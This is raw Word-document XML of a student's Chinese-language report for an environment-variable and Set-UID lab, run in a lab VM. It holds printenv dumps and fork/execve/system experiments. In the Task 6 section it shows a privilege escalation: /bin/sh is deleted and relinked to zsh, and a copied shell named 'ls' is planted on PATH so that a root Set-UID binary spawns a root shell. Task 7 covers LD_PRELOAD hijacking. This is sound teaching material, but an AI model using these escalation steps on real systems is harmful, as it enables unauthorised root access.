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36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>Environment Variable and Set-UID Program Lab</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:hAnsi="方正清仿宋 简 Bold" w:eastAsia="方正清仿宋 简 Bold" w:cs="方正清仿宋 简 Bold" w:asciiTheme="majorAsci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36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>57118133 钟杰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t>Task 1：Manipulating Environment Variables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Use printenv or env command to print out the environment variables.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t>实验结果：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  <w:t xml:space="preserve">[09/02/20]seed@VM:~$ </w:t>
      </w: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highlight w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>printenv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XDG_VTNR=7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ORBIT_SOCKETDIR=/tmp/orbit-seed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XDG_SESSION_ID=c1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XDG_GREETER_DATA_DIR=/var/lib/lightdm-data/seed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TERMINATOR_UUID=urn:uuid:68d16744-29dc-4fc2-9193-c128e6511cf4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IBUS_DISABLE_SNOOPER=1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CLUTTER_IM_MODULE=xim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SESSION=ubuntu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GIO_LAUNCHED_DESKTOP_FILE_PID=5345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ANDROID_HOME=/home/seed/android/android-sdk-linux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GPG_AGENT_INFO=/home/seed/.gnupg/S.gpg-agent:0:1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TERM=xterm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SHELL=/bin/bash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DERBY_HOME=/usr/lib/jvm/java-8-oracle/db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QT_LINUX_ACCESSIBILITY_ALWAYS_ON=1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LD_PRELOAD=/home/seed/lib/boost/libboost_program_options.so.1.64.0:/home/seed/lib/boost/libboost_filesystem.so.1.64.0:/home/seed/lib/boost/libboost_system.so.1.64.0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WINDOWID=52428804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UPSTART_SESSION=unix:abstract=/com/ubuntu/upstart-session/1000/1913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GNOME_KEYRING_CONTROL=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GTK_MODULES=gail:atk-bridge:unity-gtk-module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USER=seed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QT_ACCESSIBILITY=1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LD_LIBRARY_PATH=/home/seed/source/boost_1_64_0/stage/lib:/home/seed/source/boost_1_64_0/stage/lib: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XDG_SESSION_PATH=/org/freedesktop/DisplayManager/Session0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XDG_SEAT_PATH=/org/freedesktop/DisplayManager/Seat0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SSH_AUTH_SOCK=/run/user/1000/keyring/ssh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DEFAULTS_PATH=/usr/share/gconf/ubuntu.default.path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GIO_LAUNCHED_DESKTOP_FILE=/usr/share/applications/terminator.desktop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XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/usr/share/upstart/xdg:/etc/xdg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DESKTOP_SESSION=ubuntu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PATH=/home/seed/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:.:/snap/bin:/usr/lib/jvm/java-8-oracle/bin:/usr/lib/jvm/java-8-oracle/db/bin:/usr/lib/jvm/java-8-oracle/jre/bin:/home/seed/android/android-sdk-linux/tools:/home/seed/android/android-sdk-linux/platform-tools:/home/seed/android/android-ndk/android-ndk-r8d:/home/seed/.local/b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QT_IM_MODULE=ibus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QT_QPA_PLATFORMTHEME=appmenu-qt5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XDG_SESSION_TYPE=x11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PWD=/home/seed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JOB=unity-settings-daemon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XMODIFIERS=@im=ibus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JAVA_HOME=/usr/lib/jvm/java-8-oracle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GNOME_KEYRING_PID=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LANG=en_US.UTF-8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GDM_LANG=en_US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MANDATORY_PATH=/usr/share/gconf/ubuntu.mandatory.path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COMPIZ_CONFIG_PROFILE=ubuntu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IM_CONFIG_PHASE=1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GDMSESSION=ubuntu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SESSIONTYPE=gnome-session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GTK2_MODULES=overlay-scrollbar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SHLVL=1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HOME=/home/seed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XDG_SEAT=seat0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LANGUAGE=en_US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GNOME_DESKTOP_SESSION_ID=this-is-deprecated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UPSTART_INSTANCE=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XDG_SESSION_DESKTOP=ubuntu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UPSTART_EVENTS=xsession started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LOGNAME=seed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COMPIZ_BIN_PATH=/usr/bin/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DBUS_SESSION_BUS_ADDRESS=unix:abstract=/tmp/dbus-PVnZz5loPY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J2SDKDIR=/usr/lib/jvm/java-8-oracle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XDG_DATA_DIRS=/usr/share/ubuntu:/usr/share/gnome:/usr/local/share/:/usr/share/:/var/lib/snapd/desktop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QT4_IM_MODULE=xim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LESSOPEN=| /usr/bin/lesspipe %s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INSTANCE=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UPSTART_JOB=unity7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XDG_RUNTIME_DIR=/run/user/1000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DISPLAY=:0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XDG_CURRENT_DESKTOP=Unity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GTK_IM_MODULE=ibus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J2REDIR=/usr/lib/jvm/java-8-oracle/jre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LESSCLOSE=/usr/bin/lesspipe %s %s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XAUTHORITY=/home/seed/.Xauthority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COLORTERM=gnome-terminal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_=/usr/bin/printenv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t>Use export and unset to set or unset environment variables.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t>代码段：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="both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762375" cy="1304925"/>
            <wp:effectExtent l="0" t="0" r="1905" b="5715"/>
            <wp:docPr id="1" name="图片 1" descr="9}OLOXR0(}LF21E%ZSO8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}OLOXR0(}LF21E%ZSO8OW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t>Task 2：Passing Environment Variables from Parent Process to Child Process</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="both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t>代码段：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="both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3040" cy="1084580"/>
            <wp:effectExtent l="0" t="0" r="0" b="12700"/>
            <wp:docPr id="3" name="图片 3" descr="900XA4(RH@@$4M$%A0$G[Z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00XA4(RH@@$4M$%A0$G[Z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t>分析：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:firstLine="360" w:firstLineChars="200"/>
        <w:jc w:val="both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通过比较这两个文件，可以发现，这两个文件输出的环境变量完全相同。说明原环境变量被子进程完全继承。通过man fork，对fork函数做了进一步了解。fork函数通过系统调用创建一个与原来进程几乎完全相同的进程，子进程自父进程继承了进程的资格，环境，堆栈与内存根目录等；但是子进程没有继承父进程的某些特性，比如父进程号，文件描述符，在tms结构中的系统时间，资源使用等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:firstLine="360" w:firstLineChars="200"/>
        <w:jc w:val="both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Task 3：Environment Variables and execve()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t>运行结果：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  <w:t>[09/02/20]seed@VM:~/.../task 3$ gcc -o b.out b.c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b.c: In function ‘main’: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b.c:9:2: warning: implicit declaration of function ‘execve’ [-Wimplicit-function-declaration]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  execve("/usr/bin/env", argv, NULL);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  ^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  <w:t>[09/02/20]seed@VM:~/.../task 3$ ./b.out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  <w:t>[09/02/20]seed@VM:~/.../task 3$ gcc -o b.out b.c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b.c: In function ‘main’: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b.c:9:2: warning: implicit declaration of function ‘execve’ [-Wimplicit-function-declaration]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  execve("/usr/bin/env", argv, environ);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  ^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  <w:t>[09/02/20]seed@VM:~/.../task 3$ ./b.out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XDG_VTNR=7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XDG_SESSION_ID=c1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XDG_GREETER_DATA_DIR=/var/lib/lightdm-data/seed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CLUTTER_IM_MODULE=xim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SESSION=ubuntu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ANDROID_HOME=/home/seed/android/android-sdk-linux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GPG_AGENT_INFO=/home/seed/.gnupg/S.gpg-agent:0:1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TERM=xterm-256color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VTE_VERSION=4205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XDG_MENU_PREFIX=gnome-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SHELL=/bin/bash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DERBY_HOME=/usr/lib/jvm/java-8-oracle/db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QT_LINUX_ACCESSIBILITY_ALWAYS_ON=1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LD_PRELOAD=/home/seed/lib/boost/libboost_program_options.so.1.64.0:/home/seed/lib/boost/libboost_filesystem.so.1.64.0:/home/seed/lib/boost/libboost_system.so.1.64.0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WINDOWID=50331658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UPSTART_SESSION=unix:abstract=/com/ubuntu/upstart-session/1000/1913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GNOME_KEYRING_CONTROL=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GTK_MODULES=gail:atk-bridge:unity-gtk-module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USER=seed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QT_ACCESSIBILITY=1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LD_LIBRARY_PATH=/home/seed/source/boost_1_64_0/stage/lib:/home/seed/source/boost_1_64_0/stage/lib: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XDG_SESSION_PATH=/org/freedesktop/DisplayManager/Session0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XDG_SEAT_PATH=/org/freedesktop/DisplayManager/Seat0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SSH_AUTH_SOCK=/run/user/1000/keyring/ssh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DEFAULTS_PATH=/usr/share/gconf/ubuntu.default.path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SESSION_MANAGER=local/VM:@/tmp/.ICE-unix/2367,unix/VM:/tmp/.ICE-unix/2367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XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/usr/share/upstart/xdg:/etc/xdg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DESKTOP_SESSION=ubuntu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PATH=/home/seed/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:.:/snap/bin:/usr/lib/jvm/java-8-oracle/bin:/usr/lib/jvm/java-8-oracle/db/bin:/usr/lib/jvm/java-8-oracle/jre/bin:/home/seed/android/android-sdk-linux/tools:/home/seed/android/android-sdk-linux/platform-tools:/home/seed/android/android-ndk/android-ndk-r8d:/home/seed/.local/bin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QT_IM_MODULE=ibus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QT_QPA_PLATFORMTHEME=appmenu-qt5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XDG_SESSION_TYPE=x11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PWD=/home/seed/Desktop/task 3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JOB=dbus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XMODIFIERS=@im=ibus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JAVA_HOME=/usr/lib/jvm/java-8-oracle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GNOME_KEYRING_PID=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LANG=en_US.UTF-8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GDM_LANG=en_US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MANDATORY_PATH=/usr/share/gconf/ubuntu.mandatory.path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COMPIZ_CONFIG_PROFILE=ubuntu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IM_CONFIG_PHASE=1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GDMSESSION=ubuntu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SESSIONTYPE=gnome-session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GTK2_MODULES=overlay-scrollbar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SHLVL=1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HOME=/home/seed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XDG_SEAT=seat0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LANGUAGE=en_US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GNOME_DESKTOP_SESSION_ID=this-is-deprecated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XDG_SESSION_DESKTOP=ubuntu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LOGNAME=seed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DBUS_SESSION_BUS_ADDRESS=unix:abstract=/tmp/dbus-PVnZz5loPY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J2SDKDIR=/usr/lib/jvm/java-8-oracle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XDG_DATA_DIRS=/usr/share/ubuntu:/usr/share/gnome:/usr/local/share/:/usr/share/:/var/lib/snapd/desktop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QT4_IM_MODULE=xim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LESSOPEN=| /usr/bin/lesspipe %s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INSTANCE=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XDG_RUNTIME_DIR=/run/user/1000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DISPLAY=:0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XDG_CURRENT_DESKTOP=Unity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GTK_IM_MODULE=ibus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J2REDIR=/usr/lib/jvm/java-8-oracle/jre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LESSCLOSE=/usr/bin/lesspipe %s %s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XAUTHORITY=/home/seed/.Xauthority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_=./b.out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t>结论：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int execve(const char * filename，char * const argv[]，char * const envp[])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execve()用来执行参数filename字符串所代表的文件路径，filename必须是一个二进制的可执行文件，或者是一个脚本以#!格式开头的解释器参数。如果是后者，这个解释器必须是一个可执行的有效的路径名。第二个参数系利用数组指针来传递给执行文件，argv是要调用的程序执行的参数序列，也就是我们要调用的程序需要传入的参数。envp则为传递给执行文件的新环境变量数组,同样也为参数序列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从以上实验可以看出，execve()产生的新进程的环境变量又调用时重新赋予，而fork()则是直接继承父进程环境变量。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Task 4 : Environment Variables and system()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t>运行结果：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  <w:t>[09/02/20]seed@VM:~/.../task 4$ gcc -o a.out a.c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  <w:t>[09/02/20]seed@VM:~/.../task 4$ ./a.out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LESSOPEN=| /usr/bin/lesspipe %s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GNOME_KEYRING_PID=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USER=seed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LANGUAGE=en_US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J2SDKDIR=/usr/lib/jvm/java-8-oracle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XDG_SEAT=seat0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SESSION=ubuntu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XDG_SESSION_TYPE=x11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COMPIZ_CONFIG_PROFILE=ubuntu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LD_LIBRARY_PATH=/home/seed/source/boost_1_64_0/stage/lib:/home/seed/source/boost_1_64_0/stage/lib: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SHLVL=1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J2REDIR=/usr/lib/jvm/java-8-oracle/jre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HOME=/home/seed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QT4_IM_MODULE=xim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DESKTOP_SESSION=ubuntu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QT_LINUX_ACCESSIBILITY_ALWAYS_ON=1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GTK_MODULES=gail:atk-bridge:unity-gtk-module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XDG_SEAT_PATH=/org/freedesktop/DisplayManager/Seat0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INSTANCE=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DBUS_SESSION_BUS_ADDRESS=unix:abstract=/tmp/dbus-PVnZz5loPY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GNOME_KEYRING_CONTROL=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QT_QPA_PLATFORMTHEME=appmenu-qt5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MANDATORY_PATH=/usr/share/gconf/ubuntu.mandatory.path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IM_CONFIG_PHASE=1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SESSIONTYPE=gnome-session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LOGNAME=seed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GTK_IM_MODULE=ibus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WINDOWID=50331658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_=./a.out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DEFAULTS_PATH=/usr/share/gconf/ubuntu.default.path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XDG_SESSION_ID=c1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TERM=xterm-256color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GNOME_DESKTOP_SESSION_ID=this-is-deprecated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GTK2_MODULES=overlay-scrollbar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PATH=/home/seed/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:.:/snap/bin:/usr/lib/jvm/java-8-oracle/bin:/usr/lib/jvm/java-8-oracle/db/bin:/usr/lib/jvm/java-8-oracle/jre/bin:/home/seed/android/android-sdk-linux/tools:/home/seed/android/android-sdk-linux/platform-tools:/home/seed/android/android-ndk/android-ndk-r8d:/home/seed/.local/bin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DERBY_HOME=/usr/lib/jvm/java-8-oracle/db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SESSION_MANAGER=local/VM:@/tmp/.ICE-unix/2367,unix/VM:/tmp/.ICE-unix/2367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GDM_LANG=en_US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XDG_MENU_PREFIX=gnome-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XDG_SESSION_PATH=/org/freedesktop/DisplayManager/Session0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XDG_RUNTIME_DIR=/run/user/1000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DISPLAY=:0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LD_PRELOAD=/home/seed/lib/boost/libboost_program_options.so.1.64.0:/home/seed/lib/boost/libboost_filesystem.so.1.64.0:/home/seed/lib/boost/libboost_system.so.1.64.0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LANG=en_US.UTF-8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XDG_CURRENT_DESKTOP=Unity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XMODIFIERS=@im=ibus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XDG_SESSION_DESKTOP=ubuntu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XAUTHORITY=/home/seed/.Xauthority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XDG_GREETER_DATA_DIR=/var/lib/lightdm-data/seed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SSH_AUTH_SOCK=/run/user/1000/keyring/ssh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SHELL=/bin/bash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QT_ACCESSIBILITY=1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GDMSESSION=ubuntu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LESSCLOSE=/usr/bin/lesspipe %s %s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GPG_AGENT_INFO=/home/seed/.gnupg/S.gpg-agent:0:1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UPSTART_SESSION=unix:abstract=/com/ubuntu/upstart-session/1000/1913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XDG_VTNR=7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QT_IM_MODULE=ibus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PWD=/home/seed/Desktop/task 4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JAVA_HOME=/usr/lib/jvm/java-8-oracle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CLUTTER_IM_MODULE=xim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ANDROID_HOME=/home/seed/android/android-sdk-linux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XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/usr/share/upstart/xdg:/etc/xdg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XDG_DATA_DIRS=/usr/share/ubuntu:/usr/share/gnome:/usr/local/share/:/usr/share/:/var/lib/snapd/desktop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VTE_VERSION=4205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JOB=dbus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t>结论：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system函数定义为 int system（const char * string），该函数调用/bin/sh来执行参数指定的命令,/bin/sh一般是一个软连接，指向某个具体的shell，比如bash,-c 选项是告诉shell从字符串command中读取命令；在该command执行期间，SIGCHLD信号会被暂时搁置，SIGINT和SIGQUIT则会被忽略，意思是进程收到这两个信号后没有任何动作。system（）函数的函数返回值有些复杂。为了更好地理解system（）函数的返回值，需要了解其执行过程，实际上system（）函数执行了三步操作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1 fork一个子进程；</w:t>
      </w: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2 在子进程中调用exec函数去执行command；</w:t>
      </w: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3 在父进程中调用wait去等待子进程结束。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若fork失败，system（）函数返回-1。如果exec执行成功，也即command顺利执行完毕，则返回command通过exit或return返回的值。（注意，command顺利执行不代表执行成功，例如command：“rm debuglog.txt”，不管文件存不存在该command都顺利执行了）如果exec执行失败，也即command没有顺利执行，比如信号被中断，或者command命令根本不存在，system（）函数返回127，如果command为NULL，则system（）函数返回值非0，一般为1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System（）函数的具体实现：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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:hAnsi="方正清仿宋 简 Bold" w:eastAsia="方正清仿宋 简 Bold" w:cs="方正清仿宋 简 Bold" w:asciiTheme="majorAsci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1320" cy="4396740"/>
            <wp:effectExtent l="0" t="0" r="5080" b="762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t>Task 5 : Environment Variable and Set-UID Programs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/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>运行结果：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  <w:t>[09/02/20]seed@VM:~/.../task 5$ gcc -o a.out a.c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  <w:t>[09/02/20]seed@VM:~/.../task 5$ ./a.out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XDG_VTNR=7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XDG_SESSION_ID=c1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XDG_GREETER_DATA_DIR=/var/lib/lightdm-data/seed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CLUTTER_IM_MODULE=xim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SESSION=ubuntu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ANDROID_HOME=/home/seed/android/android-sdk-linux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GPG_AGENT_INFO=/home/seed/.gnupg/S.gpg-agent:0:1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TERM=xterm-256color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VTE_VERSION=4205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XDG_MENU_PREFIX=gnome-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SHELL=/bin/bash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DERBY_HOME=/usr/lib/jvm/java-8-oracle/db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QT_LINUX_ACCESSIBILITY_ALWAYS_ON=1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LD_PRELOAD=/home/seed/lib/boost/libboost_program_options.so.1.64.0:/home/seed/lib/boost/libboost_filesystem.so.1.64.0:/home/seed/lib/boost/libboost_system.so.1.64.0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WINDOWID=18874378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UPSTART_SESSION=unix:abstract=/com/ubuntu/upstart-session/1000/2010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GNOME_KEYRING_CONTROL=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GTK_MODULES=gail:atk-bridge:unity-gtk-module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USER=seed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QT_ACCESSIBILITY=1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LD_LIBRARY_PATH=/home/seed/source/boost_1_64_0/stage/lib:/home/seed/source/boost_1_64_0/stage/lib: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XDG_SESSION_PATH=/org/freedesktop/DisplayManager/Session0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XDG_SEAT_PATH=/org/freedesktop/DisplayManager/Seat0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SSH_AUTH_SOCK=/run/user/1000/keyring/ssh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DEFAULTS_PATH=/usr/share/gconf/ubuntu.default.path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SESSION_MANAGER=local/VM:@/tmp/.ICE-unix/2368,unix/VM:/tmp/.ICE-unix/2368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XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/usr/share/upstart/xdg:/etc/xdg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DESKTOP_SESSION=ubuntu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PATH=/home/seed/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:.:/snap/bin:/usr/lib/jvm/java-8-oracle/bin:/usr/lib/jvm/java-8-oracle/db/bin:/usr/lib/jvm/java-8-oracle/jre/bin:/home/seed/android/android-sdk-linux/tools:/home/seed/android/android-sdk-linux/platform-tools:/home/seed/android/android-ndk/android-ndk-r8d:/home/seed/.local/bin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QT_IM_MODULE=ibus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QT_QPA_PLATFORMTHEME=appmenu-qt5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XDG_SESSION_TYPE=x11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PWD=/home/seed/Desktop/task 5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JOB=dbus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XMODIFIERS=@im=ibus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JAVA_HOME=/usr/lib/jvm/java-8-oracle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GNOME_KEYRING_PID=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LANG=en_US.UTF-8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GDM_LANG=en_US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MANDATORY_PATH=/usr/share/gconf/ubuntu.mandatory.path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COMPIZ_CONFIG_PROFILE=ubuntu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IM_CONFIG_PHASE=1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GDMSESSION=ubuntu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SESSIONTYPE=gnome-session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GTK2_MODULES=overlay-scrollbar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SHLVL=1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HOME=/home/seed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XDG_SEAT=seat0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LANGUAGE=en_US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GNOME_DESKTOP_SESSION_ID=this-is-deprecated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XDG_SESSION_DESKTOP=ubuntu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LOGNAME=seed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DBUS_SESSION_BUS_ADDRESS=unix:abstract=/tmp/dbus-noRDhaBlGg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J2SDKDIR=/usr/lib/jvm/java-8-oracle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XDG_DATA_DIRS=/usr/share/ubuntu:/usr/share/gnome:/usr/local/share/:/usr/share/:/var/lib/snapd/desktop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QT4_IM_MODULE=xim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LESSOPEN=| /usr/bin/lesspipe %s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INSTANCE=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XDG_RUNTIME_DIR=/run/user/1000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DISPLAY=:0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XDG_CURRENT_DESKTOP=Unity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GTK_IM_MODULE=ibus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J2REDIR=/usr/lib/jvm/java-8-oracle/jre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LESSCLOSE=/usr/bin/lesspipe %s %s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XAUTHORITY=/home/seed/.Xauthority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_=./a.out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  <w:t>[09/02/20]seed@VM:~/.../task 5$ sudo chown root a.c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  <w:t>[09/02/20]seed@VM:~/.../task 5$ sudo chmod 4755 a.c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  <w:t>[09/02/20]seed@VM:~/.../task 5$ export PATH="$PATH:/usr/local/"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  <w:t>[09/02/20]seed@VM:~/.../task 5$ export LD_LIBRARY_PATH="$LD_LIBRARY_PATH:/usr/local/"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  <w:t>[09/02/20]seed@VM:~/.../task 5$ export ANY_NAME="/usr/local"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  <w:t>[09/02/20]seed@VM:~/.../task 5$ gcc -o a.out a.c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FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>[09/02/20]seed@VM:~/.../task 5$ ./a.out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XDG_VTNR=7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XDG_SESSION_ID=c1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XDG_GREETER_DATA_DIR=/var/lib/lightdm-data/seed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CLUTTER_IM_MODULE=xim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SESSION=ubuntu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ANDROID_HOME=/home/seed/android/android-sdk-linux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GPG_AGENT_INFO=/home/seed/.gnupg/S.gpg-agent:0:1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TERM=xterm-256color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VTE_VERSION=4205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XDG_MENU_PREFIX=gnome-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SHELL=/bin/bash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DERBY_HOME=/usr/lib/jvm/java-8-oracle/db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QT_LINUX_ACCESSIBILITY_ALWAYS_ON=1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LD_PRELOAD=/home/seed/lib/boost/libboost_program_options.so.1.64.0:/home/seed/lib/boost/libboost_filesystem.so.1.64.0:/home/seed/lib/boost/libboost_system.so.1.64.0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WINDOWID=18874378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UPSTART_SESSION=unix:abstract=/com/ubuntu/upstart-session/1000/2010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GNOME_KEYRING_CONTROL=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GTK_MODULES=gail:atk-bridge:unity-gtk-module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USER=seed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QT_ACCESSIBILITY=1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LD_LIBRARY_PATH=/home/seed/source/boost_1_64_0/stage/lib:/home/seed/source/boost_1_64_0/stage/lib::/usr/local/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XDG_SESSION_PATH=/org/freedesktop/DisplayManager/Session0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XDG_SEAT_PATH=/org/freedesktop/DisplayManager/Seat0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SSH_AUTH_SOCK=/run/user/1000/keyring/ssh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DEFAULTS_PATH=/usr/share/gconf/ubuntu.default.path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SESSION_MANAGER=local/VM:@/tmp/.ICE-unix/2368,unix/VM:/tmp/.ICE-unix/2368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XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/usr/share/upstart/xdg:/etc/xdg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DESKTOP_SESSION=ubuntu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PATH=/home/seed/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:.:/snap/bin:/usr/lib/jvm/java-8-oracle/bin:/usr/lib/jvm/java-8-oracle/db/bin:/usr/lib/jvm/java-8-oracle/jre/bin:/home/seed/android/android-sdk-linux/tools:/home/seed/android/android-sdk-linux/platform-tools:/home/seed/android/android-ndk/android-ndk-r8d:/home/seed/.local/bin:/usr/local/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QT_IM_MODULE=ibus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QT_QPA_PLATFORMTHEME=appmenu-qt5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XDG_SESSION_TYPE=x11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PWD=/home/seed/Desktop/task 5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JOB=dbus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XMODIFIERS=@im=ibus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JAVA_HOME=/usr/lib/jvm/java-8-oracle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GNOME_KEYRING_PID=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LANG=en_US.UTF-8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GDM_LANG=en_US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MANDATORY_PATH=/usr/share/gconf/ubuntu.mandatory.path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COMPIZ_CONFIG_PROFILE=ubuntu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IM_CONFIG_PHASE=1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GDMSESSION=ubuntu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SESSIONTYPE=gnome-session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GTK2_MODULES=overlay-scrollbar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SHLVL=1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HOME=/home/seed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XDG_SEAT=seat0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LANGUAGE=en_US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GNOME_DESKTOP_SESSION_ID=this-is-deprecated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XDG_SESSION_DESKTOP=ubuntu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LOGNAME=seed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highlight w:val="none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highlight w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>ANY_NAME=/usr/local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DBUS_SESSION_BUS_ADDRESS=unix:abstract=/tmp/dbus-noRDhaBlGg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J2SDKDIR=/usr/lib/jvm/java-8-oracle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XDG_DATA_DIRS=/usr/share/ubuntu:/usr/share/gnome:/usr/local/share/:/usr/share/:/var/lib/snapd/desktop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QT4_IM_MODULE=xim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LESSOPEN=| /usr/bin/lesspipe %s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INSTANCE=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XDG_RUNTIME_DIR=/run/user/1000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DISPLAY=:0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XDG_CURRENT_DESKTOP=Unity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GTK_IM_MODULE=ibus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J2REDIR=/usr/lib/jvm/java-8-oracle/jre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LESSCLOSE=/usr/bin/lesspipe %s %s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XAUTHORITY=/home/seed/.Xauthority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_=./a.out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可知，修改的三个环境变量已包含在shell中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color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">Task 6: The PATH Environment Variable and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:hAnsi="方正清仿宋 简 Bold" w:eastAsia="方正清仿宋 简 Bold" w:cs="方正清仿宋 简 Bold" w:asciiTheme="majorAscii"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">Set-UID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:hAnsi="方正清仿宋 简 Bold" w:eastAsia="方正清仿宋 简 Bold" w:cs="方正清仿宋 简 Bold" w:asciiTheme="majorAscii"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">Programs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color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>实验步骤：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[09/02/20]seed@VM:~/.../task6$ export PATH=/home/seed/Desktop/task6:$PATH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 xml:space="preserve">[09/02/20]seed@VM:~/.../task 6$ sudo rm /bin/sh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 xml:space="preserve">[09/02/20]seed@VM:~/.../task 6$ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default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sudo ln -s /bin/zsh /bin/sh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6$ sudo gcc -o a.out a.c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6$ sudo chown root a.out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6$ sudo chmod 4755 a.out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6$ ls -l a.out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-rwsr-xr-x 1 root root 7344 Sep  2 11:15 a.out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//使用ls -l demo6语句查看文件的权限，验证操作确实成功完成，符合题设条件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6$ cp /bin/sh ls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6$ a.out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VM% printenv PATH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/home/seed/Desktop/task6:/home/seed/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:.:/snap/bin:/usr/lib/jvm/java-8-oracle/bin:/usr/lib/jvm/java-8-oracle/db/bin:/usr/lib/jvm/java-8-oracle/jre/bin:/home/seed/android/android-sdk-linux/tools:/home/seed/android/android-sdk-linux/platform-tools:/home/seed/android/android-ndk/android-ndk-r8d:/home/seed/.local/bin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//将bin/sh复制到当前目录并命名为ls，执行demo6就会获得root权限。详细分析，先看一下PATH环境变量，它的命令找寻顺序是先找寻当前目录，而当前目录我们自己编造了一个ls，所以程序就会直接执行伪造的ls。sh原本的作用是创建一个新shell，在执行此命令后我们就会一直停留在子进程中，知道我们主动退出这个程序，我们才会回到原来的权限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 w:val="0"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">Task 7: The LD PRELOAD Environment Variable and Set-UID Programs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以普通用户的身份运行myprog程序时，输出：I am not sleeping!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default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以普通用户运行拥有root权限的myprog程序时，无输出。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default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在user2用户中再次设置LD_PRELOAD环境变量并运行myprog程序时，输出：I am not sleeping!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导致他们不同的原因就在于LD_PRELOAD环境变量。LD_PRELOAD环境变量是Unix动态链接库的世界中的一个环境变量，它可以影响程序的运行时的链接，它允许定义在程序运行前优先加载的动态链接库。这个功能主要是用来有选择性的载入不同动态链接库中的相同函数。在该实验中，mylib.c通过sleep函数，生成了一个libmylib.so.1.0.1链接库。然后将该链接库添加到LD_PRELOAD环境变量上。比较这三次实验，第一次和第三次实验myprog程序均具有seed用户权限，而在seed用户的LD_PRELOAD环境变量中也添加了该链接库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 w:val="0"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
